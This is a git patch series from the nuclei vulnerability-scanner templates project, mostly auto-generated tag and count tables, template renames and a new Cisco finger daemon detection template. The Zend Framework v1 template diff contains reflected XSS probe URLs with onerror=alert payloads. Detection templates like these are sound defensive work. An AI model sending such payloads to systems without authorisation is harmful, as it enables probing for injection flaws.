+| mojoauth | 1 | | | | | | | | | +| micro-user-service | 1 | | | | | | | | | +| uservoice | 1 | | | | | | | | | +| tor | 1 | | | | | | | | | +| ssi | 1 | | | | | | | | | +| eventtickets | 1 | | | | | | | | | +| shortpixel | 1 | | | | | | | | | +| eg | 1 | | | | | | | | | +| openmage | 1 | | | | | | | | | +| awx | 1 | | | | | | | | | +| smuggling | 1 | | | | | | | | | +| ngrok | 1 | | | | | | | | | +| flahscookie | 1 | | | | | | | | | +| goahead | 1 | | | | | | | | | +| apcu | 1 | | | | | | | | | +| jinher | 1 | | | | | | | | | +| msmtp | 1 | | | | | | | | | +| flowci | 1 | | | | | | | | | +| youtube | 1 | | | | | | | | | +| playable | 1 | | | | | | | | | +| pdflayer | 1 | | | | | | | | | +| plone | 1 | | | | | | | | | +| open-school | 1 | | | | | | | | | +| roteador | 1 | | | | | | | | | +| sofneta | 1 | | | | | | | | | +| acunetix | 1 | | | | | | | | | +| esxi | 1 | | | | | | | | | +| tox | 1 | | | | | | | | | +| pirelli | 1 | | | | | | | | | +| objectinjection | 1 | | | | | | | | | +| fortiproxy | 1 | | | | | | | | | +| kerbynet | 1 | | | | | | | | | +| aims | 1 | | | | | | | | | +| biometrics | 1 | | | | | | | | | +| kodi | 1 | | | | | | | | | +| calendarific | 1 | | | | | | | | | +| officekeeper | 1 | | | | | | | | | +| retool | 1 | | | | | | | | | +| smarterstats | 1 | | | | | | | | | +| juniper | 1 | | | | | | | | | +| pagerduty | 1 | | | | | | | | | +| europeana | 1 | | | | | | | | | +| zentao | 1 | | | | | | | | | +| blueiris | 1 | | | | | | | | | +| dwr | 1 | | | | | | | | | +| reprise | 1 | | | | | | | | | +| webasyst | 1 | | | | | | | | | +| remedy | 1 | | | | | | | | | +| xibocms | 1 | | | | | | | | | +| privx | 1 | | | | | | | | | +| avigilon | 1 | | | | | | | | | +| lancom | 1 | | | | | | | | | +| yopass | 1 | | | | | | | | | +| zookeeper | 1 | | | | | | | | | +| ubiquiti | 1 | | | | | | | | | +| daybyday | 1 | | | | | | | | | +| tembosocial | 1 | | | | | | | | | +| gnuboard5 | 1 | | | | | | | | | +| ecsimagingpacs | 1 | | | | | | | | | +| tpshop | 1 | | | | | | | | | +| weboftrust | 1 | | | | | | | | | +| purestorage | 1 | | | | | | | | | +| agentejo | 1 | | | | | | | | | +| turbo | 1 | | | | | | | | | +| zarafa | 1 | | | | | | | | | +| pyramid | 1 | | | | | | | | | +| prexview | 1 | | | | | | | | | +| triconsole | 1 | | | | | | | | | +| rollupjs | 1 | | | | | | | | | +| netbiblio | 1 | | | | | | | | | +| mspcontrol | 1 | | | | | | | | | +| office365 | 1 | | | | | | | | | +| dbt | 1 | | | | | | | | | +| mongoshake | 1 | | | | | | | | | +| readthedocs | 1 | | | | | | | | | +| member-hero | 1 | | | | | | | | | +| babel | 1 | | | | | | | | | +| doh | 1 | | | | | | | | | +| checkmarx | 1 | | | | | | | | | +| defi | 1 | | | | | | | | | +| finereport | 1 | | | | | | | | | +| browshot | 1 | | | | | | | | | +| phabricator | 1 | | | | | | | | | +| nj2000 | 1 | | | | | | | | | +| shirnecms | 1 | | | | | | | | | +| edgemax | 1 | | | | | | | | | +| nozomi | 1 | | | | | | | | | +| zenrows | 1 | | | | | | | | | +| taiga | 1 | | | | | | | | | +| oliver | 1 | | | | | | | | | +| burp | 1 | | | | | | | | | +| starttls | 1 | | | | | | | | | +| dolphinscheduler | 1 | | | | | | | | | +| terraboard | 1 | | | | | | | | | +| browserless | 1 | | | | | | | | | +| redcap | 1 | | | | | | | | | +| domino | 1 | | | | | | | | | +| rpcms | 1 | | | | | | | | | +| teradici | 1 | | | | | | | | | +| cvms | 1 | | | | | | | | | +| clockwatch | 1 | | | | | | | | | +| addpac | 1 | | | | | | | | | +| bscw | 1 | | | | | | | | | +| totolink | 1 | | | | | | | | | +| fanwei | 1 | | | | | | | | | +| opsgenie | 1 | | | | | | | | | +| wakatime | 1 | | | | | | | | | +| mdb | 1 | | | | | | | | | +| soplanning | 1 | | | | | | | | | +| okiko | 1 | | | | | | | | | +| shopify | 1 | | | | | | | | | +| pubsec | 1 | | | | | | | | | +| netrc | 1 | | | | | | | | | +| goliath | 1 | | | | | | | | | +| kenesto | 1 | | | | | | | | | +| fuji | 1 | | | | | | | | | +| cybrotech | 1 | | | | | | | | | +| xmpp | 1 | | | | | | | | | +| webmodule-ee | 1 | | | | | | | | | +| hivemanager | 1 | | | | | | | | | +| monday | 1 | | | | | | | | | +| owa | 1 | | | | | | | | | +| securitytrails | 1 | | | | | | | | | +| v2924 | 1 | | | | | | | | | +| phpmemcached | 1 | | | | | | | | | +| blitapp | 1 | | | | | | | | | +| qdpm | 1 | | | | | | | | | +| fortilogger | 1 | | | | | | | | | +| pcoweb | 1 | | | | | | | | | +| duomicms | 1 | | | | | | | | | +| sonarcloud | 1 | | | | | | | | | +| 3com | 1 | | | | | | | | | +| h-sphere | 1 | | | | | | | | | +| microcomputers | 1 | | | | | | | | | +| gilacms | 1 | | | | | | | | | +| biqsdrive | 1 | | | | | | | | | +| spf | 1 | | | | | | | | | +| currencyfreaks | 1 | | | | | | | | | +| harvardart | 1 | | | | | | | | | +| quantum | 1 | | | | | | | | | +| netweaver | 1 | | | | | | | | | +| mofi | 1 | | | | | | | | | +| orbintelligence | 1 | | | | | | | | | +| ecshop | 1 | | | | | | | | | +| soar | 1 | | | | | | | | | +| pagekit | 1 | | | | | | | | | +| mongo-express | 1 | | | | | | | | | +| fastly | 1 | | | | | | | | | +| footprints | 1 | | | | | | | | | +| gemfury | 1 | | | | | | | | | +| cors | 1 | | | | | | | | | +| savepage | 1 | | | | | | | | | +| prestahome | 1 | | | | | | | | | +| wampserver | 1 | | | | | | | | | +| raspberrymatic | 1 | | | | | | | | | +| opengraphr | 1 | | | | | | | | | +| workresources | 1 | | | | | | | | | +| expose | 1 | | | | | | | | | +| file-upload | 1 | | | | | | | | | +| keenetic | 1 | | | | | | | | | +| adoptapet | 1 | | | | | | | | | +| pivotaltracker | 1 | | | | | | | | | +| coinlayer | 1 | | | | | | | | | +| pop3 | 1 | | | | | | | | | +| roundcube | 1 | | | | | | | | | +| opnsense | 1 | | | | | | | | | +| likebtn-like-button | 1 | | | | | | | | | +| onelogin | 1 | | | | | | | | | +| nedi | 1 | | | | | | | | | +| centreon | 1 | | | | | | | | | +| stackstorm | 1 | | | | | | | | | +| qmail | 1 | | | | | | | | | +| icc-pro | 1 | | | | | | | | | +| woody | 1 | | | | | | | | | +| flowdash | 1 | | | | | | | | | +| proxykingdom | 1 | | | | | | | | | +| sungrow | 1 | | | | | | | | | +| caddy | 1 | | | | | | | | | +| patheon | 1 | | | | | | | | | +| rss | 1 | | | | | | | | | +| siteomat | 1 | | | | | | | | | +| avatier | 1 | | | | | | | | | +| ntopng | 1 | | | | | | | | | +| cmsimple | 1 | | | | | | | | | +| namedprocess | 1 | | | | | | | | | +| airtable | 1 | | | | | | | | | +| kerio | 1 | | | | | | | | | +| comfortel | 1 | | | | | | | | | +| drive | 1 | | | | | | | | | +| piano | 1 | | | | | | | | | +| etcd | 1 | | | | | | | | | +| axiom | 1 | | | | | | | | | +| oam | 1 | | | | | | | | | +| kodexplorer | 1 | | | | | | | | | +| ticketmaster | 1 | | | | | | | | | +| geocode | 1 | | | | | | | | | +| twig | 1 | | | | | | | | | +| vsphere | 1 | | | | | | | | | +| jupyterhub | 1 | | | | | | | | | +| onkyo | 1 | | | | | | | | | +| siebel | 1 | | | | | | | | | +| tracer | 1 | | | | | | | | | +| block | 1 | | | | | | | | | +| junos | 1 | | | | | | | | | +| gnu | 1 | | | | | | | | | +| particle | 1 | | | | | | | | | +| opensearch | 1 | | | | | | | | | +| ucp | 1 | | | | | | | | | +| erp-nc | 1 | | | | | | | | | +| mediumish | 1 | | | | | | | | | +| appweb | 1 | | | | | | | | | +| tinypng | 1 | | | | | | | | | +| verint | 1 | | | | | | | | | +| getgrav | 1 | | | | | | | | | +| cryptocurrencies | 1 | | | | | | | | | +| chevereto | 1 | | | | | | | | | +| simpleclientmanagement | 1 | | | | | | | | | +| coverity | 1 | | | | | | | | | +| mdm | 1 | | | | | | | | | +| kyan | 1 | | | | | | | | | +| buildbot | 1 | | | | | | | | | +| nagios-xi | 1 | | | | | | | | | +| mi | 1 | | | | | | | | | +| biotime | 1 | | | | | | | | | +| webshell | 1 | | | | | | | | | +| mod-proxy | 1 | | | | | | | | | +| sling | 1 | | | | | | | | | +| whm | 1 | | | | | | | | | +| openerp | 1 | | | | | | | | | +| nodebb | 1 | | | | | | | | | +| cofax | 1 | | | | | | | | | +| malwarebazaar | 1 | | | | | | | | | +| bonita | 1 | | | | | | | | | +| mercurial | 1 | | | | | | | | | +| sage | 1 | | | | | | | | | +| powerjob | 1 | | | | | | | | | +| sprintful | 1 | | | | | | | | | +| nsicg | 1 | | | | | | | | | +| ilch | 1 | | | | | | | | | +| cuteeditor | 1 | | | | | | | | | +| scrapingdog | 1 | | | | | | | | | +| screenshotapi | 1 | | | | | | | | | +| timeclock | 1 | | | | | | | | | +| free5gc | 1 | | | | | | | | | +| web3 | 1 | | | | | | | | | +| caa | 1 | | | | | | | | | +| iterable | 1 | | | | | | | | | +| openshift | 1 | | | | | | | | | +| elmah | 1 | | | | | | | | | +| buildkite | 1 | | | | | | | | | +| uberflip | 1 | | | | | | | | | +| synnefo | 1 | | | | | | | | | +| pagespeed | 1 | | | | | | | | | +| clave | 1 | | | | | | | | | +| zoomsounds | 1 | | | | | | | | | +| blockfrost | 1 | | | | | | | | | +| bhagavadgita | 1 | | | | | | | | | +| jalios | 1 | | | | | | | | | +| landrayoa | 1 | | | | | | | | | +| moin | 1 | | | | | | | | | +| hdnetwork | 1 | | | | | | | | | +| phpwiki | 1 | | | | | | | | | +| streetview | 1 | | | | | | | | | +| rhymix | 1 | | | | | | | | | +| ns | 1 | | | | | | | | | +| smartblog | 1 | | | | | | | | | +| weglot | 1 | | | | | | | | | +| flexbe | 1 | | | | | | | | | +| analytify | 1 | | | | | | | | | +| stytch | 1 | | | | | | | | | +| aniapi | 1 | | | | | | | | | +| mgrng | 1 | | | | | | | | | +| tika | 1 | | | | | | | | | +| agilecrm | 1 | | | | | | | | | +| headers | 1 | | | | | | | | | +| lfw | 1 | | | | | | | | | +| ssltls | 1 | | | | | | | | | +| calendly | 1 | | | | | | | | | +| argussurveillance | 1 | | | | | | | | | +| shadoweb | 1 | | | | | | | | | +| iceflow | 1 | | | | | | | | | +| landray | 1 | | | | | | | | | +| supportivekoala | 1 | | | | | | | | | +| panasonic | 1 | | | | | | | | | +| cx | 1 | | | | | | | | | +| sensei-lms | 1 | | | | | | | | | +| aryanic | 1 | | | | | | | | | +| e-mobile | 1 | | | | | | | | | +| airee | 1 | | | | | | | | | +| pghero | 1 | | | | | | | | | +| gridx | 1 | | | | | | | | | +| garagemanagementsystem | 1 | | | | | | | | | +| dotclear | 1 | | | | | | | | | +| radius | 1 | | | | | | | | | +| webviewer | 1 | | | | | | | | | +| stats | 1 | | | | | | | | | +| tectuus | 1 | | | | | | | | | +| vault | 1 | | | | | | | | | +| pandorafms | 1 | | | | | | | | | +| envoy | 1 | | | | | | | | | +| cname | 1 | | | | | | | | | +| cve2000 | 1 | | | | | | | | | +| mongoose | 1 | | | | | | | | | +| np | 1 | | | | | | | | | +| email | 1 | | | | | | | | | +| emerson | 1 | | | | | | | | | +| helprace | 1 | | | | | | | | | +| bitdefender | 1 | | | | | | | | | +| ti-woocommerce-wishlist | 1 | | | | | | | | | +| shindig | 1 | | | | | | | | | +| oscommerce | 1 | | | | | | | | | +| holidayapi | 1 | | | | | | | | | +| tensorboard | 1 | | | | | | | | | +| default | 1 | | | | | | | | | +| dropbox | 1 | | | | | | | | | +| currencyscoop | 1 | | | | | | | | | +| hypertest | 1 | | | | | | | | | +| tls | 1 | | | | | | | | | +| tugboat | 1 | | | | | | | | | +| gpon | 1 | | | | | | | | | +| maccmsv10 | 1 | | | | | | | | | +| arl | 1 | | | | | | | | | +| concrete5 | 1 | | | | | | | | | +| collectd | 1 | | | | | | | | | +| minimouse | 1 | | | | | | | | | +| csrfguard | 1 | | | | | | | | | +| patreon-connect | 1 | | | | | | | | | +| webui | 1 | | | | | | | | | +| html2wp | 1 | | | | | | | | | +| macaddresslookup | 1 | | | | | | | | | +| ruoyi | 1 | | | | | | | | | +| wordpress-country-selector | 1 | | | | | | | | | +| clockwork | 1 | | | | | | | | | +| vertex | 1 | | | | | | | | | +| labtech | 1 | | | | | | | | | +| wavemaker | 1 | | | | | | | | | +| rsa | 1 | | | | | | | | | +| rainloop | 1 | | | | | | | | | +| curcy | 1 | | | | | | | | | +| wptouch | 1 | | | | | | | | | +| AlphaWeb | 1 | | | | | | | | | +| graphiql | 1 | | | | | | | | | +| html2pdf | 1 | | | | | | | | | +| incomcms | 1 | | | | | | | | | +| jmeter | 1 | | | | | | | | | +| ccm | 1 | | | | | | | | | +| director | 1 | | | | | | | | | +| atg | 1 | | | | | | | | | +| feifeicms | 1 | | | | | | | | | +| turbocrm | 1 | | | | | | | | | +| spinnaker | 1 | | | | | | | | | +| telecom | 1 | | | | | | | | | +| flureedb | 1 | | | | | | | | | +| nexusdb | 1 | | | | | | | | | +| bullwark | 1 | | | | | | | | | +| leanix | 1 | | | | | | | | | +| mirasys | 1 | | | | | | | | | +| ojs | 1 | | | | | | | | | +| shopizer | 1 | | | | | | | | | +| olt | 1 | | | | | | | | | +| jaspersoft | 1 | | | | | | | | | +| jreport | 1 | | | | | | | | | +| phpfusion | 1 | | | | | | | | | +| qvidium | 1 | | | | | | | | | +| sarg | 1 | | | | | | | | | +| wpcargo | 1 | | | | | | | | | +| mozilla | 1 | | | | | | | | | +| myucms | 1 | | | | | | | | | +| securityspy | 1 | | | | | | | | | +| appsmith | 1 | | | | | | | | | +| strikingly | 1 | | | | | | | | | +| mastodon | 1 | | | | | | | | | +| cve2001 | 1 | | | | | | | | | +| magicflow | 1 | | | | | | | | | +| tink | 1 | | | | | | | | | +| remkon | 1 | | | | | | | | | +| vcloud | 1 | | | | | | | | | +| mailwatch | 1 | | | | | | | | | +| segment | 1 | | | | | | | | | +| pyproject | 1 | | | | | | | | | +| h2 | 1 | | | | | | | | | +| csod | 1 | | | | | | | | | +| fastpanel | 1 | | | | | | | | | +| binom | 1 | | | | | | | | | +| bazarr | 1 | | | | | | | | | +| bibliopac | 1 | | | | | | | | | +| mkdocs | 1 | | | | | | | | | +| backupbuddy | 1 | | | | | | | | | +| satellian | 1 | | | | | | | | | +| davantis | 1 | | | | | | | | | +| logger1000 | 1 | | | | | | | | | +| tufin | 1 | | | | | | | | | +| rwebserver | 1 | | | | | | | | | +| nzbget | 1 | | | | | | | | | +| moinmoin | 1 | | | | | | | | | +| gstorage | 1 | | | | | | | | | +| myanimelist | 1 | | | | | | | | | +| quixplorer | 1 | | | | | | | | | +| bacnet | 1 | | | | | | | | | +| placeos | 1 | | | | | | | | | +| gateone | 1 | | | | | | | | | +| pagecdn | 1 | | | | | | | | | +| machproweb | 1 | | | | | | | | | +| nette | 1 | | | | | | | | | +| fontawesome | 1 | | | | | | | | | +| faraday | 1 | | | | | | | | | diff --git a/TOP-10.md b/TOP-10.md index 6f439c586e..d3507f9b19 100644 --- a/TOP-10.md +++ b/TOP-10.md @@ -1,12 +1,12 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 1551 | dhiyaneshdk | 701 | cves | 1528 | info | 1666 | http | 4323 | -| panel | 778 | daffainfo | 662 | exposed-panels | 780 | high | 1152 | file | 78 | -| edb | 582 | pikpikcu | 344 | vulnerabilities | 519 | medium | 835 | network | 77 | +| cve | 1552 | dhiyaneshdk | 701 | cves | 1529 | info | 1671 | http | 4330 | +| panel | 780 | daffainfo | 662 | exposed-panels | 782 | high | 1152 | file | 78 | +| edb | 582 | pikpikcu | 344 | vulnerabilities | 520 | medium | 837 | network | 77 | | exposure | 551 | pdteam | 274 | misconfiguration | 361 | critical | 552 | dns | 17 | -| xss | 541 | geeknik | 206 | technologies | 319 | low | 281 | | | -| lfi | 519 | dwisiswant0 | 171 | exposures | 308 | unknown | 25 | | | -| wordpress | 470 | pussycat0x | 171 | token-spray | 236 | | | | | -| cve2021 | 369 | 0x_akoko | 170 | workflows | 190 | | | | | -| wp-plugin | 365 | ritikchaddha | 163 | default-logins | 116 | | | | | -| tech | 357 | princechaddha | 153 | file | 78 | | | | | +| xss | 543 | geeknik | 206 | technologies | 322 | low | 281 | | | +| lfi | 519 | pussycat0x | 172 | exposures | 308 | unknown | 25 | | | +| wordpress | 471 | dwisiswant0 | 171 | token-spray | 236 | | | | | +| cve2021 | 370 | 0x_akoko | 170 | workflows | 190 | | | | | +| wp-plugin | 366 | ritikchaddha | 164 | default-logins | 116 | | | | | +| tech | 360 | princechaddha | 153 | file | 78 | | | | | From a9ade0bd0f9fe63fb7044ca2ba60e9bf880bc38b Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 7 Dec 2022 09:33:53 +0000 Subject: [PATCH 0236/1133] Auto README Update [Wed Dec 7 09:33:53 UTC 2022] :robot: --- README.md | 20 ++++++++++---------- 1 file changed, 10 insertions(+), 10 deletions(-) diff --git a/README.md b/README.md index bfd9c83aa8..f8f3e9f053 100644 --- a/README.md +++ b/README.md @@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags, | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 1551 | dhiyaneshdk | 701 | cves | 1528 | info | 1666 | http | 4323 | -| panel | 778 | daffainfo | 662 | exposed-panels | 780 | high | 1152 | file | 78 | -| edb | 582 | pikpikcu | 344 | vulnerabilities | 519 | medium | 835 | network | 77 | +| cve | 1552 | dhiyaneshdk | 701 | cves | 1529 | info | 1671 | http | 4330 | +| panel | 780 | daffainfo | 662 | exposed-panels | 782 | high | 1152 | file | 78 | +| edb | 582 | pikpikcu | 344 | vulnerabilities | 520 | medium | 837 | network | 77 | | exposure | 551 | pdteam | 274 | misconfiguration | 361 | critical | 552 | dns | 17 | -| xss | 541 | geeknik | 206 | technologies | 319 | low | 281 | | | -| lfi | 519 | dwisiswant0 | 171 | exposures | 308 | unknown | 25 | | | -| wordpress | 470 | pussycat0x | 171 | token-spray | 236 | | | | | -| cve2021 | 369 | 0x_akoko | 170 | workflows | 190 | | | | | -| wp-plugin | 365 | ritikchaddha | 163 | default-logins | 116 | | | | | -| tech | 357 | princechaddha | 153 | file | 78 | | | | | +| xss | 543 | geeknik | 206 | technologies | 322 | low | 281 | | | +| lfi | 519 | pussycat0x | 172 | exposures | 308 | unknown | 25 | | | +| wordpress | 471 | dwisiswant0 | 171 | token-spray | 236 | | | | | +| cve2021 | 370 | 0x_akoko | 170 | workflows | 190 | | | | | +| wp-plugin | 366 | ritikchaddha | 164 | default-logins | 116 | | | | | +| tech | 360 | princechaddha | 153 | file | 78 | | | | | -**321 directories, 4733 files**. +**321 directories, 4736 files**. </td> </tr> From 972bafe93e37e13634ef36f0533f85b1e049aa9e Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 7 Dec 2022 09:42:26 +0000 Subject: [PATCH 0237/1133] Auto Generated CVE annotations [Wed Dec 7 09:42:26 UTC 2022] :robot: --- vulnerabilities/wordpress/wp-related-post-xss.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/wordpress/wp-related-post-xss.yaml b/vulnerabilities/wordpress/wp-related-post-xss.yaml index a254d86a6f..e35bb23a11 100644 --- a/vulnerabilities/wordpress/wp-related-post-xss.yaml +++ b/vulnerabilities/wordpress/wp-related-post-xss.yaml @@ -11,7 +11,7 @@ info: - https://wordpress.org/plugins/wordpress-23-related-posts-plugin/advanced/ metadata: verified: true - tags: wordpress,wp,wp-plugin,xss,relatedposts,authenticated + tags: wp-plugin,xss,relatedposts,authenticated,huntr,wordpress,wp requests: - raw: From 5fc63a1b3fb9123cf688269850c17caa49bc5123 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 7 Dec 2022 16:31:33 +0530 Subject: [PATCH 0239/1133] Update and rename aircube-dashboard-panel to aircube-dashboard-panel.yaml --- .../{aircube-dashboard-panel => aircube-dashboard-panel.yaml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename exposed-panels/{aircube-dashboard-panel => aircube-dashboard-panel.yaml} (100%) diff --git a/exposed-panels/aircube-dashboard-panel b/exposed-panels/aircube-dashboard-panel.yaml similarity index 100% rename from exposed-panels/aircube-dashboard-panel rename to exposed-panels/aircube-dashboard-panel.yaml From 5d1472b6fbdb650117d7c3bd87e5df5ec12d5019 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 7 Dec 2022 16:51:19 +0530 Subject: [PATCH 0240/1133] Update netris-dashboard-panel.yaml --- exposed-panels/netris-dashboard-panel.yaml | 3 --- 1 file changed, 3 deletions(-) diff --git a/exposed-panels/netris-dashboard-panel.yaml b/exposed-panels/netris-dashboard-panel.yaml index a6c1277976..8903b81b62 100644 --- a/exposed-panels/netris-dashboard-panel.yaml +++ b/exposed-panels/netris-dashboard-panel.yaml @@ -14,9 +14,6 @@ requests: path: - '{{BaseURL}}' - host-redirects: true - max-redirects: 2 - matchers-condition: and matchers: - type: word From 3b95be42a3cf3a2d90833d888e4c3dc27f0e3408 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 7 Dec 2022 16:58:04 +0530 Subject: [PATCH 0241/1133] Update mag-dashboard-login.yaml --- exposed-panels/mag-dashboard-login.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/exposed-panels/mag-dashboard-login.yaml b/exposed-panels/mag-dashboard-login.yaml index 90c662d403..5c93554ab5 100644 --- a/exposed-panels/mag-dashboard-login.yaml +++ b/exposed-panels/mag-dashboard-login.yaml @@ -1,7 +1,7 @@ -id: mag-dashboard-login +id: mag-dashboard-panel info: - name: MAG Dashboard Login + name: MAG Dashboard Panel author: theamanrawat severity: info metadata: From c93fc1edb901ad0baa90e2b3a772daa65ec523fc Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 7 Dec 2022 17:01:54 +0530 Subject: [PATCH 0242/1133] Update metaview-explorer-installer.yaml --- misconfiguration/installer/metaview-explorer-installer.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/misconfiguration/installer/metaview-explorer-installer.yaml b/misconfiguration/installer/metaview-explorer-installer.yaml index c3b302b70a..73812bbf97 100644 --- a/misconfiguration/installer/metaview-explorer-installer.yaml +++ b/misconfiguration/installer/metaview-explorer-installer.yaml @@ -7,7 +7,7 @@ info: metadata: verified: true shodan-query: http.title:"MetaView Explorer" - tags: metaview,installer,misconfig + tags: misconfig,metaview,installer requests: - method: GET From f514265ce6a80015a19366c977da84d45994ff6c Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 7 Dec 2022 11:32:30 +0000 Subject: [PATCH 0243/1133] Auto Generated New Template Addition List [Wed Dec 7 11:32:30 UTC 2022] :robot: --- .new-additions | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/.new-additions b/.new-additions index 54d7352fa9..f80fe468cd 100644 --- a/.new-additions +++ b/.new-additions @@ -1,2 +1,2 @@ -exposed-panels/jcms-panel.yaml -technologies/pypiserver-detect.yaml +exposed-panels/aircube-dashboard-panel.yaml +exposed-panels/netris-dashboard-panel.yaml From 90333cb8e09c0ae7de04aab4cd73300a6a1e0a34 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 7 Dec 2022 17:02:49 +0530 Subject: [PATCH 0245/1133] Rename mag-dashboard-login.yaml to mag-dashboard-panel.yaml --- .../{mag-dashboard-login.yaml => mag-dashboard-panel.yaml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename exposed-panels/{mag-dashboard-login.yaml => mag-dashboard-panel.yaml} (100%) diff --git a/exposed-panels/mag-dashboard-login.yaml b/exposed-panels/mag-dashboard-panel.yaml similarity index 100% rename from exposed-panels/mag-dashboard-login.yaml rename to exposed-panels/mag-dashboard-panel.yaml From 5ee6aa48e4ec5f582ccc6f9d014ad5edabdc9277 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 7 Dec 2022 11:34:20 +0000 Subject: [PATCH 0246/1133] Auto Generated New Template Addition List [Wed Dec 7 11:34:20 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index f80fe468cd..99189852c6 100644 --- a/.new-additions +++ b/.new-additions @@ -1,2 +1,3 @@ exposed-panels/aircube-dashboard-panel.yaml exposed-panels/netris-dashboard-panel.yaml +misconfiguration/installer/metaview-explorer-installer.yaml From cc4d470efca10d5558d2802e21c7e1f6eb622727 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 7 Dec 2022 11:35:06 +0000 Subject: [PATCH 0247/1133] Auto Generated New Template Addition List [Wed Dec 7 11:35:05 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 99189852c6..6361e35b4b 100644 --- a/.new-additions +++ b/.new-additions @@ -1,3 +1,4 @@ exposed-panels/aircube-dashboard-panel.yaml +exposed-panels/mag-dashboard-panel.yaml exposed-panels/netris-dashboard-panel.yaml misconfiguration/installer/metaview-explorer-installer.yaml From 94f4e01212040755ee5ed3b7dd62f56c423d641d Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 7 Dec 2022 12:35:54 +0000 Subject: [PATCH 0248/1133] Auto Generated New Template Addition List [Wed Dec 7 12:35:54 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 6361e35b4b..9be8811cad 100644 --- a/.new-additions +++ b/.new-additions @@ -2,3 +2,4 @@ exposed-panels/aircube-dashboard-panel.yaml exposed-panels/mag-dashboard-panel.yaml exposed-panels/netris-dashboard-panel.yaml misconfiguration/installer/metaview-explorer-installer.yaml +network/detection/redis-detect.yaml From f417ca8a2b9aba4a3d680fae369fef010e8372ae Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 7 Dec 2022 18:23:56 +0530 Subject: [PATCH 0249/1133] Update zend-v1-xss.yaml --- vulnerabilities/zend/zend-v1-xss.yaml | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) diff --git a/vulnerabilities/zend/zend-v1-xss.yaml b/vulnerabilities/zend/zend-v1-xss.yaml index 1b31b2ec8f..2f9dbda3b7 100644 --- a/vulnerabilities/zend/zend-v1-xss.yaml +++ b/vulnerabilities/zend/zend-v1-xss.yaml @@ -16,16 +16,17 @@ info: requests: - method: GET path: - - "{{BaseURL}}/vendor/diablomedia/zendframework1-http/tests/Zend/Http/Client/_files/testRedirections.php?redirection=3¶m=<img/src=x%20onerror=alert(1)>%20a='{{randstr}}'>" - - "{{BaseURL}}/tests/Zend/Http/Client/_files/testRedirections.php?redirection=3¶m=<img/src=x%20onerror=alert(1)%20a='{{randstr}}'>" + - "{{BaseURL}}/vendor/diablomedia/zendframework1-http/tests/Zend/Http/Client/_files/testRedirections.php?redirection=3¶m=<img/src=x%20onerror=alert(1)>%20a='test'>" + - "{{BaseURL}}/tests/Zend/Http/Client/_files/testRedirections.php?redirection=3¶m=<img/src=x%20onerror=alert(document.domain)%20a='test'>" matchers-condition: and matchers: - type: word part: body words: - - '{{randstr}}' - - '<img/src=x onerror=alert(1)' + - '"redirection"]' + - '"param"' + - '<img/src=x onerror=alert(document.domain)' condition: and - type: status From edef7ef85412a5ce7000b0bda610fbee91a38f46 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Wed, 7 Dec 2022 18:44:26 +0530 Subject: [PATCH 0250/1133] Add files via upload --- network/detection/cisco-finger-detect.yaml | 29 ++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 network/detection/cisco-finger-detect.yaml diff --git a/network/detection/cisco-finger-detect.yaml b/network/detection/cisco-finger-detect.yaml new file mode 100644 index 0000000000..474d738596 --- /dev/null +++ b/network/detection/cisco-finger-detect.yaml @@ -0,0 +1,29 @@ +id: cisco-finger-detect + +info: + name: Cisco Finger Daemon Detection + author: pussycat0x + severity: low + description: | + The finger daemon runs on TCP port 79. The client will (in the case of remote hosts) open a connection to port 79. + metadata: + verified: true + shodan-query: product:"Cisco fingerd" + tags: network,finger + +network: + - inputs: + - data: "\n" + + host: + - "{{Hostname}}" + - "{{Host}}:79" + + matchers: + - type: word + part: body + words: + - "Interface" + - "Mode" + - "User" + condition: and \ No newline at end of file From a033b96cebd187df642218bef477e870b19d723c Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 7 Dec 2022 19:22:26 +0530 Subject: [PATCH 0251/1133] Update zend-v1-xss.yaml --- vulnerabilities/zend/zend-v1-xss.yaml | 25 +++++++++++++------------ 1 file changed, 13 insertions(+), 12 deletions(-) diff --git a/vulnerabilities/zend/zend-v1-xss.yaml 